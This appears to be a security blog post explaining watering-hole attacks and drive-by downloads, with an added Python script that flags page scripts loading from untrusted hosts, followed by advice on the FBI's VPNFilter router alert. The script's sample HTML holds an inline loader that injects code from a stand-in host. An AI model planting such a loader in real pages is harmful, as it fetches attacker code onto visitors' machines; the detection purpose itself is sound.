“Watering Hole” Cyber Crime Tactics

20 years ago cybercriminals used only a few techniques to lure in potential victims. One was an email with the subject line “ILOVEYOU” carrying an attachment that was a virus/worm which infected the user’s machine. The second was a message from a Nigerian prince offering a share of a huge investment opportunity, then asking for your bank account number so the money could be transferred to you for safekeeping – after a small advance payment to cover the transfer expense.

Over the past two decades cybercriminals have grown very sophisticated in their tactics. One methodology targets specific individuals in an organization so that they unknowingly allow the criminal to gain access to the organization’s computer network. The tactic called the “watering hole” attacks an organization by compromising a web site that the target would generally trust – the watering hole.

To identify a watering hole to bait, the criminal first deploys any of a number of commonly used tracking tools, such as KISSmetrics or AddThis, to see which web sites the employees of an organization visit. This gives the criminal a map of candidate sites from which to pick vulnerable ones for infiltration, those without strict security. The criminal then plants malicious code on the watering hole site and simply waits for users to revisit it.

Once users begin visiting the watering hole, their devices are scanned for known security vulnerabilities. On any device found to have one, the criminal uses the “drive-by” download technique, meaning the visitor doesn’t even need to click a link or download a file. Instead, malicious code such as a Remote Access Trojan (RAT) is downloaded in the background. When that code runs it scans for additional vulnerabilities, and exploit code that carries out the real intended network attack is delivered and executed.
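A site owner’s counterpart to the attack above is to check what scripts their own pages actually load, because a compromised watering hole shows up as a script the owner never placed there. The following is an added example, not code from the original article: it parses a page’s HTML, lists every external script source and every inline script, and flags any that reference a host outside a constructed allowlist. The host names (corp.example, tracker.example, unknown.example) and the sample HTML are constructed for the example.

```python
"""Audit a page's <script> tags against an allowlist of trusted hosts.

Added example (not from the original article). The allowlist, the page
host and the sample HTML below are constructed placeholders.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allowlist: hosts this site is expected to load scripts from.
TRUSTED_HOSTS = {"www.corp.example", "cdn.corp.example"}

# Constructed sample page: one relative script, one trusted CDN script,
# one unexpected tracker, and one inline loader pulling from an unknown host.
SAMPLE_HTML = """<html><head>
<script src="/js/app.js"></script>
<script src="https://cdn.corp.example/lib.js"></script>
<script src="//stats.tracker.example/t.js"></script>
<script>var s=document.createElement('script');
s.src='https://loader.unknown.example/x.js';document.head.appendChild(s);</script>
</head><body><p>hello</p></body></html>"""


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from HTML."""

    def __init__(self):
        super().__init__()
        self.external = []      # values of <script src="...">
        self.inline = []        # bodies of <script> ... </script>
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        # html.parser hands script content to handle_data as raw text.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf).strip())


def script_host(src, page_host):
    """Return the host a script URL loads from; relative URLs are same-origin."""
    netloc = urlparse(src).netloc      # handles http(s)://host and //host forms
    return netloc.lower() if netloc else page_host


def audit_scripts(html, page_host, trusted=TRUSTED_HOSTS):
    """Return (kind, detail) findings for scripts that reach untrusted hosts."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.external:
        if script_host(src, page_host) not in trusted:
            findings.append(("untrusted-src", src))
    for body in collector.inline:
        # Inline loaders typically build a URL string; pull out its host.
        for host in dict.fromkeys(re.findall(r"https?://([A-Za-z0-9.-]+)", body)):
            if host.lower() not in trusted:
                findings.append(("inline-ref", host.lower()))
    return findings


if __name__ == "__main__":
    for kind, detail in audit_scripts(SAMPLE_HTML, "www.corp.example"):
        print(f"{kind}: {detail}")
```

Run against a saved copy of a page (or a crawl of the site) on a schedule and diff the findings over time; a script source or inline loader that was not there yesterday is exactly the signal a planted watering-hole payload leaves behind. Relative sources count as same-origin here, so a compromise of the site’s own files would need a separate integrity check of those files.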


Reboot Your Internet Router? Yes! Do This Too

The FBI recently issued an alert about a malware threat that has infected home and small business routers. The threat, called VPNFilter, is able to perform multiple functions, including possible information collection, device exploitation, and blocking network traffic. The malware targets routers produced by several manufacturers and network-attached storage devices from at least one manufacturer. They include, but are not limited to:

Linksys: E1200, E2500, WRVS4400N
Mikrotik: 1016, 1036, 1072
Netgear: DGN2200, R6400, R7000, R8000, WNR1000, WNR2000
QNAP: TS251, S439 Pro, other QNAP NAS devices running QTS software
TP-Link: R600VPN

ALSO: Update the Firmware!

The FBI alert recommended people reboot their Internet routers to help stop the malware from spreading. That’s a great start; power cycling doesn’t hurt and takes no time. However, to really protect devices one should update the devices’ firmware, since few routers update it automatically. Firmware is the router’s operating system.

Updating the firmware is not as difficult as one may think, though people may be intimidated or worried they may break the device. Step-by-step guides are available to help update the firmware on specific routers.

Resources:

The FBI says you should reboot your router. Should you? CNET, May 31, 2018.